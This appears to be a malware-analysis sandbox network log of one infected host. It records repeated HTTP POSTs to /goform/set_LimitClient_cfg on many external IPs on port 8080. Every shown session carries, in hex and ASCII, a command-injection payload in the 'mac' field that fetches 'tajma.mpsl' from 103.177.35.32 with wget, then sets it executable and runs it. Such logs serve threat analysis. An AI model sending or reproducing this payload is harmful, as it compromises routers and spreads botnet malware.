                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2052192.168.2.235139059.6.220.878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427676916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2053192.168.2.2342776181.34.127.2008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427725077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2054192.168.2.2354558118.87.219.1148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427755117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2055192.168.2.2353004179.157.206.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427766085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2056192.168.2.2354944174.7.60.1128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427788019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2057192.168.2.2352522131.115.84.238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427802086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2058192.168.2.2333410160.237.101.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427830935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2059192.168.2.2335116181.232.111.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427853107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2060192.168.2.2335942145.43.55.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427872896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2061192.168.2.2339954210.143.40.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427896976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2062192.168.2.2360508167.54.193.2008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.427926064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2063192.168.2.2341202156.209.160.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428210974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2064192.168.2.233498490.195.194.1368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428529024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2065192.168.2.234132448.49.242.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428569078 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2066192.168.2.2348120175.106.73.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428570032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2067192.168.2.2346658191.152.124.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428603888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2068192.168.2.234652866.131.73.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428617954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2069192.168.2.2359624193.116.229.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428652048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2070192.168.2.2338394170.97.108.1088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428663969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2071192.168.2.2350138146.233.223.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428757906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2072192.168.2.2343962192.211.175.1028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428792000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2073192.168.2.235380468.144.231.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428807974 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2074192.168.2.2339330130.116.202.398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.428818941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
